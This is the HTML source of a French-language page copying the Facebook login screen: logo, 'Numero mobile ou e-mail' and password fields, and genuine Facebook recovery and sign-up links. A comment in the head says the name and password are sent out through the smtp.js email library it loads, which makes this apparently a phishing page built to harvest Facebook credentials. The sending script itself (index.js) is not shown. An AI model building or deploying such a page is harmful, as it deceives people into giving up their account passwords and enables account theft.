<!DOCTYPE html>
<html long="en">
<head>
    <meta charset="UFT-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
     <!-- logo-->
     <link rel="icon" href="image/12.png">
    <!-- css-->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.3.0/font/bootstrap-icons.css" />
    <link rel="stylesheet" href="style.css">
    <!--sent name ou pass smtp.js-->
    <script src="https://smtpjs.com/v3/smtp.js"></script>
</head>
<body>
    <div id="error" class="error"></div>
        <div class="content">
            <h1 style="font-family: PB;">facebook</h1>
        </div>
        <div class="form-parent">
            <form class="form-contact" action="#" id="form">
                <input type="text" placeholder="Numero mobile ou e-mail"  id="name" >
                <p class="p2">
                    <input type="password" name="password" id="password" placeholder="Mot de passe" />
                    <i class="bi bi-eye-slash" id="togglePassword"></i>
                </p >
                <input type="submit" value="Se connect" class="login-btn" id="submit" >
                <a href="https://web.facebook.com/login/identify/?ctx=recover&ars=facebook_login&from_login_screen=0" class="forget-link">
                    Mot de passe oublie?
                </a>
                <hr>
                <a href="https://m.facebook.com/reg/?is_two_steps_login=0&cid=103&refsrc=deprecated&soft=hjk" class="btn">
                    Creer nouveau compte
                </a>
                <div class="langue">
                    <ul>
                        <div class="right">
                            <a class="a">Français (France)</a>
                            <br>
                            <a class="LM" dir="ltr" href="" >ⵜⴰⵎⴰⵣⵉⵖⵜ</a>
                            <br>
                            <a class="LES" dir="ltr" href="" >Español (España)</a>
                            <br>
                            <a class="LD" dir="ltr" href="" >Deutsch</a>
                        </div>
                        <div class="left">
                            <a class="LA" dir="rtl" href="" >العربية</a>
                            <br>
                            <a class="LEN" dir="ltr" href="" >English (UK)</a>
                            <br>
                            <a class="LP" dir="ltr" href="" >Português (Brasil)</a>
                            <br>
                        </div>
                    </ul>
                </div>
            </form>
            <div class="aa"><a>À propos</a><span> · </span><a class="ss">Aide</a><span aria-hidden="true"> · </span><span class="dd">Plus</span></div>
            <span class="ff">Meta © 2024</span>
        <script src="./index.js"></script>
        <script src="https://www.drv.tw/inc/wd.js?s=a0mjkw6gygoae1iz10d9ow"></script>
</body>
</html>